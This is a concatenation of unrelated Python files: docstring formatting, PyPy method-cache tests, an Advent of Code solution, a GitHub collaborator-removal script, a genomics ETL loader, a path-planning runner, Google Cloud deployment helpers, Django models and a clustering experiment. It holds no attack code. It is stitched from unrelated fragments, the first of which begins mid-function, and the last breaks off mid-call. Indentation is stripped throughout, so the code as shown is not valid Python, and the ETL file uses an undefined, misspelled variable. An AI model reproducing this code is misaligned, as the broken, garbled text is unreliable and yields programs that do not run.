doc = spec.argument_docs[key]
name = key
if name in spec.kwonlyargs:
key = _prefix_key(key)
if name in aliases:
aliases[name].sort(key=len, reverse=True)
key = '{}, {}'.format(
key, ', '.join(aliases[name]))
items.append(_get_one_argument_doc(key, doc, width, tabstop))
sections.append('\n'.join(items))
return '\n\n'.join(sections)
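# A minimal, hypothetical usage sketch (not part of the module): wrap
# inspect.getfullargspec in a mutable namespace so load_doc_hints can attach
# the parsed descriptions, argument docs and aliases, then print the
# normalized docstring. The function `greet` below is made up for the demo.
if __name__ == "__main__":
    import inspect
    from types import SimpleNamespace

    def greet(name, *, shout=False, **extra):
        """Print a greeting.

        Arguments:
            name: who to greet
            shout: print the greeting in upper case
            -s: --shout
        """

    raw = inspect.getfullargspec(greet)
    spec = SimpleNamespace(**raw._asdict())
    spec.kwonlydefaults = dict(raw.kwonlydefaults or {})
    spec.annotations = dict(raw.annotations)
    spec = load_doc_hints(spec, greet.__doc__)
    print(get_normalized_docstring(spec))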
|
from pypy.objspace.std.test import test_typeobject
class AppTestMethodCaching(test_typeobject.AppTestTypeObject):
spaceconfig = {"objspace.std.withmethodcachecounter": True}
def setup_class(cls):
# This is for the following tests, which are a bit fragile and
# historically have been failing once in a while. With this hack,
# they are run up to 5 times in a row, saving the frame of the
# failed attempt. This means occasional collisions should work
# differently during the retry.
cls.w_retry = cls.space.appexec([], """():
def retry(run):
keepalive = []
for i in range(4):
try:
return run()
except AssertionError:
import sys
keepalive.append(sys.exc_info())
return run()
return retry
""")
def test_mix_classes(self):
@self.retry
def run():
import __pypy__
class A(object):
def f(self):
return 42
class B(object):
def f(self):
return 43
class C(object):
def f(self):
return 44
l = [A(), B(), C()] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
assert a.f() == 42 + i % 3
cache_counter = __pypy__.method_cache_counter("f")
assert cache_counter[0] >= 15
assert cache_counter[1] >= 3 # should be (27, 3)
assert sum(cache_counter) == 30
def test_class_that_cannot_be_cached(self):
@self.retry
def run():
import __pypy__
class X:
pass
class Y(object):
pass
class A(Y, X):
def f(self):
return 42
class B(object):
def f(self):
return 43
class C(object):
def f(self):
return 44
l = [A(), B(), C()] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
assert a.f() == 42 + i % 3
cache_counter = __pypy__.method_cache_counter("f")
assert cache_counter[0] >= 9
assert cache_counter[1] >= 2 # should be (18, 2)
assert sum(cache_counter) == 20
def test_change_methods(self):
@self.retry
def run():
import __pypy__
class A(object):
def f(self):
return 42
l = [A()] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
assert a.f() == 42 + i
A.f = eval("lambda self: %s" % (42 + i + 1, ))
cache_counter = __pypy__.method_cache_counter("f")
#
# a bit of explanation about what's going on. (1) is the line "a.f()"
# and (2) is "A.f = ...".
#
# at line (1) we do the lookup on type(a).f
#
# at line (2) we do a setattr on A. However, descr_setattr does also a
# lookup of type(A).f i.e. type.f, to check if by chance 'f' is a data
# descriptor.
#
# At the first iteration:
# (1) is a miss because it's the first lookup of A.f. The result is cached
#
# (2) is a miss because it is the first lookup of type.f. The
# (non-existent) result is cached. The version of A changes, and 'f'
# is changed to be a cell object, so that subsequent assignments won't
# change the version of A
#
# At the second iteration:
# (1) is a miss because the version of A changed just before
# (2) is a hit, because type.f is cached. The version of A no longer changes
#
# At the third and subsequent iterations:
# (1) is a hit, because the version of A did not change
# (2) is a hit, see above
assert cache_counter == (17, 3)
def test_subclasses(self):
@self.retry
def run():
import __pypy__
class A(object):
def f(self):
return 42
class B(object):
def f(self):
return 43
class C(A):
pass
l = [A(), B(), C()] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
assert a.f() == 42 + (i % 3 == 1)
cache_counter = __pypy__.method_cache_counter("f")
assert cache_counter[0] >= 15
assert cache_counter[1] >= 3 # should be (27, 3)
assert sum(cache_counter) == 30
def test_many_names(self):
@self.retry
def run():
import __pypy__
for j in range(20):
class A(object):
foo = 5
bar = 6
baz = 7
xyz = 8
stuff = 9
a = 10
foobar = 11
a = A()
names = [name for name in A.__dict__.keys()
if not name.startswith('_')]
names.sort()
names_repeated = names * 10
result = []
__pypy__.reset_method_cache_counter()
for name in names_repeated:
result.append(getattr(a, name))
append_counter = __pypy__.method_cache_counter("append")
names_counters = [__pypy__.method_cache_counter(name)
for name in names]
try:
assert append_counter[0] >= 10 * len(names) - 1
for name, count in zip(names, names_counters):
assert count == (9, 1), str((name, count))
break
except AssertionError:
pass
else:
raise
def test_mutating_bases(self):
class C(object):
pass
class C2(object):
foo = 5
class D(C):
pass
class E(D):
pass
d = D()
e = E()
D.__bases__ = (C2,)
assert e.foo == 5
class F(object):
foo = 3
D.__bases__ = (C, F)
assert e.foo == 3
def test_custom_metaclass(self):
@self.retry
def run():
import __pypy__
for j in range(20):
class MetaA(type):
def __getattribute__(self, x):
return 1
def f(self):
return 42
A = type.__new__(MetaA, "A", (), {"f": f})
l = [type.__getattribute__(A, "__new__")(A)] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
# use getattr to circumvent the mapdict cache
assert getattr(a, "f")() == 42
cache_counter = __pypy__.method_cache_counter("f")
assert sum(cache_counter) == 10
if cache_counter == (9, 1):
break
#else the moon is misaligned, try again
else:
raise AssertionError("cache_counter = %r" % (cache_counter,))
def test_mutate_class(self):
@self.retry
def run():
import __pypy__
class A(object):
x = 1
y = 2
__pypy__.reset_method_cache_counter()
a = A()
for i in range(100):
assert a.y == 2
assert a.x == i + 1
A.x += 1
cache_counter = __pypy__.method_cache_counter("x")
# XXX this is the bad case for the mapdict cache: looking up
# non-method attributes from the class
assert cache_counter[0] >= 450
assert cache_counter[1] >= 1
assert sum(cache_counter) == 500
__pypy__.reset_method_cache_counter()
a = A()
for i in range(100):
assert a.y == 2
setattr(a, "a%s" % i, i)
cache_counter = __pypy__.method_cache_counter("x")
assert cache_counter[0] == 0 # 0 hits, because all the attributes are new
|
from collections import defaultdict
def main():
with open("day_10_input.txt") as f:
input_lines = [int(x) for x in f.read().splitlines()]
adapters = [0] + sorted(input_lines)
adapters.append(adapters[-1] + 3)
differences = defaultdict(int)
for i in range(len(adapters) - 1):
differences[adapters[i + 1] - adapters[i]] += 1
print(f"Part 1: {differences[1] * differences[3]}")
connections = defaultdict(int)
connections[0] = 1
for adapter in adapters[1:]:
connections[adapter] = sum([connections[adapter - i] for i in range(1, 4)])
print(f"Part 2: {connections[adapters[-1]]}")
if __name__ == "__main__":
main()
|
from PIL import Image
import numpy as np
def pil_load_img(path):
image = Image.open(path)
# Convert to RGB if the image is not already in that mode (e.g. grayscale)
if image.mode != 'RGB':
image = image.convert('RGB')
image = np.array(image)
return image
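# A minimal usage sketch (the file path below is hypothetical): the loader
# always returns an H x W x 3 uint8 array, even for grayscale inputs.
# img = pil_load_img("samples/example.png")
# print(img.shape)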
|
#!/usr/bin/python3
import requests
import json
def run(token, username, repository, collaborator):
url = f"https://api.github.com/repos/{username}/{repository}/collaborators/{collaborator}"
authorization = f"token {token}"
headers = {
"Accept": "application/vnd.github.v3+json",
"Authorization" : authorization,
}
r1 = requests.get(
url=url,
headers=headers
)
if r1.status_code == 204:
r2 = requests.delete(
url=url,
headers=headers
)
if r2.status_code == 204:
print(f"✅ Collaborator \033[36m{collaborator}\033[0m successfully removed from {username}'s \033[36m{repository}\033[0m repository")
else:
print("❌ Couldn't delete the collaborator from the repository")
print (r2.status_code, r2.reason)
else:
print(f"⚠️ Username \033[36m{collaborator}\033[0m isn't a \033[36m{repository}\033[0m repository collaborator")
|
"""VEP Transcript ETL."""
import logging
import multiprocessing
import uuid
import re
from etl import ETL
from etl.helpers import ETLHelper
from files import TXTFile
from transactors import CSVTransactor
from transactors import Neo4jTransactor
class VEPTranscriptETL(ETL):
"""VEP Transcript ETL."""
logger = logging.getLogger(__name__)
# Query templates which take params and will be processed later
vep_transcript_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Transcript {primaryKey:row.transcriptId})
MATCH (a:Variant {hgvsNomenclature:row.hgvsNomenclature})
CREATE (gc:TranscriptLevelConsequence {primaryKey:row.primaryKey})
SET gc.molecularConsequences = apoc.convert.fromJsonList(row.molecularConsequences),
gc.transcriptId = g.primaryKey,
gc.variantId = a.hgvsNomenclature,
gc.impact = row.impact,
gc.aminoAcidReference = row.aminoAcidReference,
gc.aminoAcidVariation = row.aminoAcidVariation,
gc.aminoAcidChange = row.aminoAcidChange,
gc.cdnaStartPosition = row.cdnaStartPosition,
gc.cdnaEndPosition = row.cdnaEndPosition,
gc.cdnaRange = row.cdnaRange,
gc.cdsStartPosition = row.cdsStartPosition,
gc.cdsEndPosition = row.cdsEndPosition,
gc.cdsRange = row.cdsRange,
gc.proteinStartPosition = row.proteinStartPosition,
gc.proteinEndPosition = row.proteinEndPosition,
gc.proteinRange = row.proteinRange,
gc.codonChange = row.codonChange,
gc.codonReference = row.codonReference,
gc.codonVariation = row.codonVariation,
gc.hgvsProteinNomenclature = row.hgvsProteinNomenclature,
gc.hgvsCodingNomenclature = row.hgvsCodingNomenclature,
gc.hgvsVEPGeneNomenclature = row.hgvsVEPGeneNomenclature,
gc.polyphenPrediction = row.polyphenPrediction,
gc.polyphenScore = row.polyphenScore,
gc.siftPrediction = row.siftPrediction,
gc.siftScore = row.siftScore
CREATE (g)-[ggc:ASSOCIATION {primaryKey:row.primaryKey}]->(gc)
CREATE (a)-[ga:ASSOCIATION {primaryKey:row.primaryKey}]->(gc)
CREATE (g)-[gv:ASSOCIATION {primaryKey:row.primaryKey}]->(a)
CREATE (p:VariantProteinSequence {primaryKey:row.variantProteinSequenceKey})
SET p.proteinSequence = row.variantProteinSequence
SET p.variantId = row.hgvsNomenclature
SET p.transcriptId = row.transcriptId
CREATE (a)-[ps:PROTEIN_SEQUENCE]->(p)
MERGE(syn:Synonym:Identifier {primaryKey:row.hgvsVEPGeneNomenclature})
SET syn.name = row.hgvsVEPGeneNomenclature
MERGE (a)-[aka2:ALSO_KNOWN_AS]->(syn)
"""
def __init__(self, config):
"""Initialise object."""
super().__init__()
self.data_type_config = config
def _load_and_process_data(self):
thread_pool = []
for sub_type in self.data_type_config.get_sub_type_objects():
process = multiprocessing.Process(
target=self._process_sub_type, args=(sub_type,))
process.start()
thread_pool.append(process)
ETL.wait_for_threads(thread_pool)
def _process_sub_type(self, sub_type):
self.logger.info("Loading VEP Data: %s", sub_type.get_data_provider())
commit_size = self.data_type_config.get_neo4j_commit_size()
filepath = sub_type.get_filepath()
# This needs to be in this format (template, param1, params2) others will be ignored
query_template_list = [
[self.vep_transcript_query_template, commit_size,
"vep_transcript_data_" + sub_type.get_data_provider() + ".csv"]
]
# Obtain the generator
generators = self.get_generators(filepath, sub_type.get_data_provider())
query_and_file_list = self.process_query_params(query_template_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages("VEPTran-{}: ".format(sub_type.get_data_provider()))
def return_range_split_values(self, column):
"""Get range vaues."""
if "-" in column:
if column == '-':
start = ""
end = ""
ranger = ""
else:
start = column.split("-")[0]
end = column.split("-")[1]
ranger = column
elif "/" in column:
if column == '/':
start = ""
end = ""
ranger = ""
else:
start = column.split("/")[0]
end = column.split("/")[1]
ranger = column
else:
start = column
end = column
ranger = column
return start, end, ranger
def get_generators(self, filepath, data_provider): # noqa Needs simplifying
"""Get Generators."""
data = TXTFile(filepath).get_data()
vep_maps = []
prot_func_regex = re.compile(r'^([^\(]+)\(([\d\.]+)\)')
for line in data:
impact = ''
hgvs_p = ''
hgvs_c = ''
hgvs_g = ''
pph_prediction = ''
pph_score = ''
sift_prediction = ''
sift_score = ''
variant_protein_sequence = ''
transcript_wt_sequence = ''
columns = line.split()
if line.startswith('#'):
self.logger.warning(line)
reg = re.compile(r'## Output produced at (.*)')
match = reg.match(line)
if match:
date_produced = match.group(1)
ETLHelper.load_release_info_from_args(logger=self.logger, provider=data_provider, sub_type='VEPTRANSCRIPT', date_produced=date_produced)
continue
notes = columns[13]
kvpairs = notes.split(";")
if kvpairs is not None:
for pair in kvpairs:
key = pair.split("=")[0]
value = pair.split("=")[1]
if key == 'IMPACT':
impact = value
elif key == 'HGVSp':
hgvs_p = value.replace("%3D", "=")
elif key == 'HGVSc':
hgvs_c = value
elif key == 'HGVSg':
hgvs_g = value
elif key == 'PolyPhen':
m = prot_func_regex.match(value)
pph_prediction = m.group(1)
pph_score = m.group(2)
elif key == 'SIFT':
m = prot_func_regex.match(value)
sift_prediction = m.group(1)
sift_score = m.group(2)
elif key == 'VarSeq':
variant_protein_sequence = value
elif key == 'WtSeq':
transcript_wt_sequence = value
if columns[3].startswith('Gene:'):
gene_id = columns[3].lstrip('Gene:')
else:
gene_id = columns[3]
cdna_start_position, cdna_end_position, cdna_range = self.return_range_split_values(
columns[7]
)
cds_start_position, cds_end_position, cds_range = self.return_range_split_values(
columns[8]
)
protein_start_position, protein_end_position, protein_range = self.return_range_split_values(
columns[9]
)
amino_acid_reference, amino_acid_variation, amino_acid_change = self.return_range_split_values(
columns[10]
)
codon_reference, codon_variation, codon_change = self.return_range_split_values(
columns[11]
)
transcript_id = columns[4]
hgvsNomenclature = columns[0]
vep_result = {"hgvsNomenclature": hgvsNomenclature,
"molecularConsequences": columns[6].split(","),
"primaryKey": str(uuid.uuid4()),
"impact": impact,
"hgvsProteinNomenclature": hgvs_p,
"hgvsCodingNomenclature": hgvs_c,
"hgvsVEPGeneNomenclature": hgvs_g,
"gene": gene_id,
"transcriptId": transcript_id,
"aminoAcidReference": amino_acid_reference,
"aminoAcidVariation": amino_acid_variation,
"aminoAcidChange": amino_acid_change,
"cdnaStartPosition": cdna_start_position,
"cdnaEndPosition": cdna_end_position,
"cdnaRange": cdna_range,
"cdsStartPosition": cds_start_position,
"cdsEndPosition": cds_end_position,
"cdsRange": cds_range,
"proteinStartPosition": protein_start_position,
"proteinEndPosition": protein_end_position,
"proteinRange": protein_range,
"codonReference": codon_reference,
"codonVariation": codon_variation,
"codonChange": codon_change,
"polyphenPrediction": pph_prediction,
"polyphenScore": pph_score,
"siftPrediction": sift_prediction,
"siftScore": sift_score,
"variantProteinSequence": variant_protein_sequnece,
"variantProteinSequenceKey": transcript_id+hgvsNomenclature,
"transcriptWtSequence": transcript_wt_sequence,
"transcriptProteinSequenceKey": transcript_id+"Protein"
}
vep_maps.append(vep_result)
yield [vep_maps]
|
from algorithms.configuration.configuration import Configuration
from algorithms.algorithm_manager import AlgorithmManager
from maps.map_manager import MapManager
from algorithms.lstm.trainer import Trainer
from analyzer.analyzer import Analyzer
from generator.generator import Generator
from simulator.services.debug import DebugLevel
from simulator.services.services import Services
from simulator.simulator import Simulator
from utility.misc import flatten
from utility.argparse import add_configuration_flags
import copy
import sys
import os
import argparse
from typing import List, Callable
class MainRunner:
main_services: Services
def __init__(self, configuration: Configuration) -> None:
self.main_services: Services = Services(configuration)
self.run = self.main_services.debug.debug_func(DebugLevel.BASIC)(self.run)
def run(self) -> None:
if self.main_services.settings.generator:
Generator.main(self)
if self.main_services.settings.trainer:
Trainer.main(self)
if self.main_services.settings.analyzer:
Analyzer.main(self)
if self.main_services.settings.load_simulator:
simulator: Simulator = Simulator(self.main_services)
simulator.start()
if self.main_services.settings.clear_cache:
self.main_services.resources.cache_dir.clear()
def arg_valid(attr: str, args: argparse.Namespace) -> bool:
if not getattr(args, attr):
print("Invalid argument, {} is not enabled".format(attr), file=sys.stderr)
return False
return True
def configure_generator(config: Configuration, args: argparse.Namespace) -> bool:
if args.generator:
config.generator = True
if args.room_size:
if not arg_valid("generator", args):
return False
config.generator_min_room_size = args.room_size[0]
config.generator_max_room_size = args.room_size[1]
if args.fill_rate:
if not arg_valid("generator", args):
return False
config.generator_obstacle_fill_min = args.fill_rate[0]
config.generator_obstacle_fill_max = args.fill_rate[1]
if args.generatortype:
if not arg_valid("generator", args):
return False
config.generator_gen_type = args.generatortype
if args.num_maps:
if not arg_valid("generator", args):
return False
config.generator_nr_of_examples = args.num_maps
return True
def configure_analyzer(config: Configuration, args: argparse.Namespace) -> bool:
if args.analyzer:
config.analyzer = True
return True
def configure_trainer(config: Configuration, args: argparse.Namespace) -> bool:
if args.trainer:
config.trainer = True
return True
def configure_visualiser(config: Configuration, args: argparse.Namespace) -> bool:
if args.visualiser:
config.load_simulator = True
config.simulator_graphics = True
if args.visualiser_flags is not None and not arg_valid("visualiser", args):
return False
return True
def configure_common(config: Configuration, args: argparse.Namespace) -> bool:
# for generator & analyzer
config.num_dim = args.dims
if args.include_builtin_algorithms:
config.algorithms.update(AlgorithmManager.builtins)
if args.list_maps:
print("Available maps:")
for key in MapManager.builtins.keys():
print(f" {key}")
print("Can also specify a custom map,")
print(" (1) cached map stored in Maps")
print(" (2) external file that contains a global variable with type that inherits from Map")
sys.exit(0)
if args.maps:
maps = MapManager.load_all(args.maps)
if not all(maps):
invalid_maps = [args.maps[i] for i in range(len(maps)) if not maps[i]]
invalid_str = ",".join('"' + a + '"' for a in invalid_maps)
valid_str = ",".join('"' + a + '"' for a in MapManager.builtins.keys())
print(f"Invalid map(s) specified: {invalid_str}", file=sys.stderr)
print(f"Available maps: {valid_str}", file=sys.stderr)
print("Can also specify a custom map,", file=sys.stderr)
print(" (1) cached map stored in Maps", file=sys.stderr)
print(" (2) external file that contains a global variable with type that inherits from Map", file=sys.stderr)
return False
maps = list(flatten(maps, depth=1))
# name uniqueness
names = [a[0] for a in maps]
if len(set(names)) != len(names):
print("Name conflict detected in custom map list:", names, file=sys.stderr)
return False
maps = dict(maps)
if args.include_default_builtin_maps or args.include_all_builtin_maps:
maps.update(MapManager.builtins)
if args.include_all_builtin_maps:
maps.update(MapManager.cached_builtins)
config.maps = maps
elif args.include_all_builtin_maps:
config.maps.update(MapManager.cached_builtins)
return True
def configure_and_run(args: argparse.Namespace, configurers: List[Callable[[Configuration, argparse.Namespace], bool]]):
config = Configuration()
for c in configurers:
if not c(config, args):
return False
if not configure_common(config, args) or \
not configure_generator(config, args) or \
not configure_analyzer(config, args) or \
not configure_trainer(config, args) or \
not configure_visualiser(config, args):
return False
mr = MainRunner(config)
mr.run()
return True
def main() -> bool:
parser = argparse.ArgumentParser(prog="main.py",
description="PathBench runner",
formatter_class=argparse.RawTextHelpFormatter)
configurers: List[Callable[[Configuration, argparse.Namespace], bool]] = []
# Run arguments
parser.add_argument("-v", "--visualiser", action='store_true', help="run visualiser (simulator with graphics)")
parser.add_argument("-g", "--generator", action='store_true', help="run generator")
parser.add_argument("-t", "--trainer", action='store_true', help="run trainer")
parser.add_argument("-a", "--analyzer", action='store_true', help="run analyzer")
# Visualiser arguments
configurers.append(add_configuration_flags(parser, visualiser_flags=True, help_prefix="[visualiser] "))
# Generator arguments
parser.add_argument("--room-size", nargs=2, type=int, help="[generator] min/max room size, in format \"min max\"")
parser.add_argument("--fill-rate", nargs=2, type=float, help="[generator] min/max fill rate in random fill rooms")
parser.add_argument("--generatortype", choices=list(Generator.AVAILABLE_GENERATION_METHODS), help="[generator] generator type")
parser.add_argument("--num-maps", type=int, help="[generator] number of maps to generate")
# Miscellaneous
parser.add_argument("--dims", type=int, help="[generator|analyzer] number of dimensions", default=3)
configurers.append(add_configuration_flags(parser, algorithms_flags=True, multiple_algorithms_specifiable=True, help_prefix="[visualiser|analyzer] "))
parser.add_argument("--include-builtin-algorithms", action='store_true',
help="[visualiser|analyzer] include all builtin algorithms even when a custom list is provided via '--algorithms'")
parser.add_argument("--maps", help="[visualiser|analyzer|trainer] maps to load (either built-in map name or module file path)", nargs="+")
parser.add_argument("--include-all-builtin-maps", action='store_true',
help="[visualiser|analyzer|trainer] include all builtin maps (includes all cached maps) even when a custom list is provided via '--maps'")
parser.add_argument("--include-default-builtin-maps", action='store_true',
help="[visualiser|analyzer|trainer] include default builtin maps (does not include all cached maps) even when a custom list is provided via '--maps'")
parser.add_argument("--list-maps", action="store_true", help="[visualiser|analyzer|trainer] output list of available built-in maps")
configurers.append(add_configuration_flags(parser, deterministic_flags=True, debug_flag=True))
args = parser.parse_args()
print("args:{}".format(args))
return configure_and_run(args, configurers)
if __name__ == "__main__":
ret = main()
exit_code = 0 if ret else 1
sys.exit(exit_code)
|
from google.cloud import storage
from google.cloud import bigquery
from google.cloud import pubsub_v1
import subprocess as sp
def replace_tokens_in_config_files(map_token_value, map_template_to_config, f_log):
for (tf,cf) in map_template_to_config:
with open(tf, "r") as h:
tf_content = h.read()
for (t,v) in map_token_value:
tf_content = tf_content.replace("{{"+t+"}}", v)
with open(cf, "w+") as h:
h.write(tf_content)
return
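# Example (hypothetical values) of the argument shapes consumed above:
#   map_token_value        = [("PROJECT_ID", "my-project"), ("REGION", "europe-west1")]
#   map_template_to_config = [("app.yaml.template", "app.yaml")]
# Tokens are written as {{PROJECT_ID}} etc. in the template files.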
def deploy_appengine_app(app_yaml, region, cwd, f_log):
log("---", f_log)
log("deploy_appengine_app()", f_log)
cmd = [
"gcloud", "app", "create", "--region", region
]
res = sp.Popen(cmd,
stdout=f_log,
stderr=f_log,
cwd=cwd
).communicate()
cmd = [
"gcloud", "-q", "app", "deploy", app_yaml
]
res = sp.Popen(cmd,
stdout=f_log,
stderr=f_log,
cwd=cwd
).communicate()
log("---", f_log)
return
def deploy_endpoints_api(openapi_yaml, cwd, f_log):
log("---", f_log)
log("deploy_endpoints_api()", f_log)
cmd = [
"gcloud", "endpoints", "services", "deploy", openapi_yaml
]
res = sp.Popen(cmd,
stdout=f_log,
stderr=f_log,
cwd=cwd
).communicate()
log("---", f_log)
return
def deploy_cloud_functions(cloud_functions, cwd, f_log):
log("---", f_log)
log("deploy_cloud_functions()", f_log)
for cf in cloud_functions:
cmd = [
"gcloud", "functions", "deploy",
cf["name"],
"--region", cf["region"],
"--source", cf["source"],
"--runtime", cf["runtime"]
]
trigger = cf["trigger"]
if trigger["type"] == "http":
cmd += ["--trigger-http"]
elif trigger["type"] == "topic":
cmd += [
"--trigger-topic", trigger["topic-name"]
]
elif trigger["type"] == "bucket":
cmd += [
"--trigger-resource", trigger["bucket-name"],
"--trigger-event", trigger["event-type"]
]
else:
raise Exception("unknown trigger type")
if "env-vars" in cf:
cmd += [
"--set-env-vars",
",".join(
"{k}={v}".format(k=k, v=v)
for (k, v)
in cf["env-vars"].items()
)]
res = sp.Popen(cmd,
stdout=f_log,
stderr=f_log,
cwd=cwd
).communicate()
log("---", f_log)
return
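# Illustrative (hypothetical) entry for the `cloud_functions` list consumed above:
#   {
#       "name": "ingest-handler",
#       "region": "europe-west1",
#       "source": "./functions/ingest",
#       "runtime": "python39",
#       "trigger": {"type": "topic", "topic-name": "ingest-topic"},
#       "env-vars": {"TARGET_BUCKET": "my-bucket"}
#   }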
def create_pubsub_topics(project_id, topics, f_log):
log("---", f_log)
log("create_pubsub_topics()", f_log)
client = pubsub_v1.PublisherClient()
for t in topics:
topic_path = client.topic_path(project=project_id, topic=t["name"])
try:
client.get_topic(topic=topic_path)
log("PubSub tobic '{t}' already exists.".format(t=topic_path), f_log)
except Exception:
client.create_topic(topic_path)
log("PubSub tobic '{t}' created.".format(t=topic_path), f_log)
log("---", f_log)
return
def create_bigquery_tables(project_id, tables, f_log):
log("---", f_log)
log("create_bigquery_tables()", f_log)
client = bigquery.Client()
for t in tables:
dataset_id = t["dataset-id"]
full_table_id = "{p}.{d}.{t}".format(
p=project_id,
d=dataset_id,
t=t["id"]
)
cols = t["columns"]
schema = [
bigquery.SchemaField(
col["name"],
col["type"],
mode=col["mode"]
) for col in cols
]
if t["id"] in [t.table_id for t in client.list_tables(dataset_id)]:
log("BigQuery table '{t}' exists already.".format(t=t["id"]), f_log)
else:
table = bigquery.Table(full_table_id, schema=schema)
client.create_table(table)
log("BigQuery table '{t}' created.".format(t=t["id"]), f_log)
log("---", f_log)
return
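# Illustrative (hypothetical) entry for the `tables` list consumed above:
#   {
#       "dataset-id": "analytics",
#       "id": "events",
#       "columns": [
#           {"name": "event_id", "type": "STRING", "mode": "REQUIRED"},
#           {"name": "created_at", "type": "TIMESTAMP", "mode": "NULLABLE"}
#       ]
#   }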
def create_bigquery_datasets(datasets, f_log):
log("---", f_log)
log("create_bigquery_datasets()", f_log)
client = bigquery.Client()
for ds in datasets:
if ds["id"] in [ds.dataset_id for ds in client.list_datasets()]:
log("BigQuery dataset '{ds}' exists already.".format(ds=ds["id"]), f_log)
else:
dataset_ref = client.dataset(ds["id"])
dataset = bigquery.Dataset(dataset_ref)
client.create_dataset(dataset)
log("BigQuery dataset '{ds}' created.".format(ds=ds["id"]), f_log)
log("---", f_log)
return
def create_storage_bucket(name, location, f_log):
log("---", f_log)
log("create_storage_bucket()", f_log)
client = storage.Client()
if name in [b.name for b in client.list_buckets()]:
b = client.get_bucket(name)
b.delete_blobs(blobs=b.list_blobs())
log("Storage bucket '{b}' exists already. Bucket was emptied.".format(b=name), f_log)
else:
b = storage.Bucket(client=client)
b.name = name
b.create(location=location)
log("Storage bucket '{b}' created.".format(b=name), f_log)
log("---", f_log)
return
def log(text, f):
f.write(text + "\n")
f.flush()
|
from __future__ import division, print_function, absolute_import
import os
import logging
import numpy as np
from PIL import Image
from tensorflow.contrib.learn.python.learn.datasets import mnist
from tensorflow.python.framework import dtypes
from tensorflow.contrib.learn.python.learn.datasets import base
# The ConvertImg function opens the images saved in imgFolder.
# Image size is expected to be 512*512; if your raw images differ from this size, resize them first.
def ConvertImg(imgFolder):
RawImgSize = (512,512)
if os.path.isdir(imgFolder) is False:
logging.warning('Raw image folder doesn\'t exist')
train_directory = os.path.join(imgFolder)
all_entries = os.listdir(train_directory)
dirnames = []
for entry in all_entries:
if os.path.isdir(os.path.join(train_directory, entry)):
dirnames.append(entry)
arr = []
label = []
for dirname in dirnames:
files = os.listdir(os.path.join(train_directory, dirname))
for file in files:
# read file as gray image
img = Image.open(os.path.join(train_directory, dirname,file)).convert('L')
if img.size[0] != RawImgSize[0] or img.size[1] != RawImgSize[1]:
print('Error on Image Size != ', RawImgSize)
else:
# The label vector is generated from the folder names: append one label (the folder name) to 'label'
label.append(dirname)
for i in range(RawImgSize[0]):
for j in range(RawImgSize[1]):
pixel = float(img.getpixel((j, i)))
arr.append(pixel)
# 'arr' is a flat 1D vector; reshape it into a (#files, imageRow, imageCol, 1) numpy array,
# then combine it with the labels using mnist's default 'DataSet' class
# and return the MNIST-like dataset.
train_labels = np.array(label)
train_images = np.array(arr).reshape((len(label),RawImgSize[0], RawImgSize[1],1))
dtype=dtypes.float32
reshape=True
seed=None
options = dict(dtype=dtype, reshape=reshape, seed=seed)
mnData = mnist.DataSet(train_images, train_labels, **options)
return mnData
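# Minimal usage sketch (the folder path is hypothetical; assumes 512x512 grayscale images
# arranged in one sub-folder per label, as described above).
if __name__ == '__main__':
    dataset = ConvertImg('./raw_images')
    print(dataset.images.shape, dataset.labels.shape)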
|
# The overall traffic controller, including concrete control details such as the traffic signals
import RLmind
from torch.autograd import Variable
import numpy as np
import traci
|
from django.db import models
from django.contrib.postgres.fields import JSONField, ArrayField
from users.models import User
from django.contrib.auth.models import Group
from django.conf import settings
from asset.models import Host, HostGroup
class Line(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name=u"产品线")
date_created = models.DateTimeField(verbose_name=u'创建时间', auto_now_add=True)
date_updated = models.DateTimeField(verbose_name=u'更新时间', auto_now=True)
def __str__(self):
return self.name
class Project(models.Model):
name = models.CharField(max_length=255, null=True)
user = models.ManyToManyField(User)
user_group = models.ForeignKey(Group, null=True, on_delete=models.SET_NULL)
host_group = models.ForeignKey(HostGroup, null=True, on_delete=models.SET_NULL)
sls = models.FilePathField(path=settings.SALT_STATE_DIRECTORY,
allow_files=False, allow_folders=True, recursive=True)
description = models.TextField(null=True)
tags = ArrayField(models.CharField(max_length=255), default=list)
status = models.IntegerField(null=True)
line = models.ForeignKey(Line, null=True, related_name=u"business", verbose_name=u"产品线",
on_delete=models.SET_NULL)
date_created = models.DateTimeField(verbose_name=u'创建时间', auto_now_add=True)
date_updated = models.DateTimeField(verbose_name=u'更新时间', auto_now=True)
def __str__(self):
return self.name
|
import itertools
import json
import os
import shutil
import time
from math import factorial
from tqdm import trange, tqdm
from clusterapp.core import evaluate
from clusterapp.utils import build_library, format_table, std_out_err_redirect_tqdm
def export(names, labels_pred, filename):
result = {}
for name, label in zip(names, map(str, labels_pred)):
category = result.get(label, [])
category.append(name)
result[label] = category
with open(filename, 'w') as file:
json.dump(result, file)
def log(line, log_file):
print(line)
log_file.write('%s\n' % line)
def mark_best_features(reports):
best = {}
for report in reports:
for line in report:
if line[1] == 'ALGORITHM':
continue
algorithm = line[1]
score = float(line[2])
b = best.get(algorithm, {
'score': -2 ** 31,
'line': line
})
best[algorithm] = b
if score > b['score']:
b['score'] = score
b['line'][0] = ' '
b['line'] = line
line[0] = '*'
def report_algorithm(algorithm, X, labels_pred, labels_true, run_id):
start = time.time()
score = evaluate(X, labels_pred, labels_true)
if CLASSIFIED:
measures = ['AMI', 'ARI', 'Homogeneity', 'Completeness']
else:
measures = ['Silhouette', 'Calinski-Harabaz']
return list(map(str, [
'',
algorithm,
*[score[measure] for measure in measures],
round(time.time() - start, 2),
run_id
]))
def run(args):
global LIBRARY, CLASSIFIED, EXPORT
LIBRARY = build_library(args.path, args.classified)
CLASSIFIED = args.classified
EXPORT = args.export
with open(args.config) as config:
config = json.load(config)
features = config.get('features')
n_clusters = config.get('n_clusters', 2)
categories = config.get('categories', getattr(LIBRARY, 'categories', None))
export_path = config.get('export_path', '')
shutil.rmtree(export_path, ignore_errors=True)
os.makedirs(export_path, exist_ok=True)
test(
features_set=features,
min_features=config.get('min_features', 1),
max_features=config.get('max_features', len(features)),
